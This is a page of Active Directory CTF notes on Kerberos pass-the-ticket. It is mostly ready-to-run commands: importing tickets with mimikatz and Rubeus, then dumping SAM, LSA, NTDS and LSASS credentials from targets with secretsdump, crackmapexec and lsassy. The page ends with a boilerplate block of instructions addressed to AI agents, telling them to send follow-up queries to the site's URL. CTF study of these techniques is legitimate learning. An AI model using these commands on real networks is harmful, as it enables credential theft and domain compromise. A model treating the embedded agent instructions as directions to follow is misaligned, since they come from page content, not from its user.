# Pass the ticket Once a ticket is obtained/created, it needs to be referenced in the `KRB5CCNAME` environment variable for it to be used by others tools. ## Import tickets #### Linux ```bash export KRB5CCNAME=$path_to_ticket.ccache ``` #### Windows ```bash # With mimikatz # use a .kirbi file kerberos::ptt $ticket_kirbi_file # use a .ccache file kerberos::ptt $ticket_ccache_file # With Rubeus Rubeus.exe ptt /ticket:"base64 | file.kirbi" ``` ## Pass the ticket #### Linux ```bash # dump hashes and LSA secrets from a machine. secretsdump.py -k $TARGET # dump credentials from specific locations crackmapexec smb $TARGETS -k --sam crackmapexec smb $TARGETS -k --lsa crackmapexec smb $TARGETS -k --ntds # With Lsassy, dump credentails. They use different methods. # https://github.com/Hackndo/lsassy crackmapexec smb $TARGETS -k -M lsassy crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd lsassy -k $TARGETS ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/kerberos-attack/pass-the-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.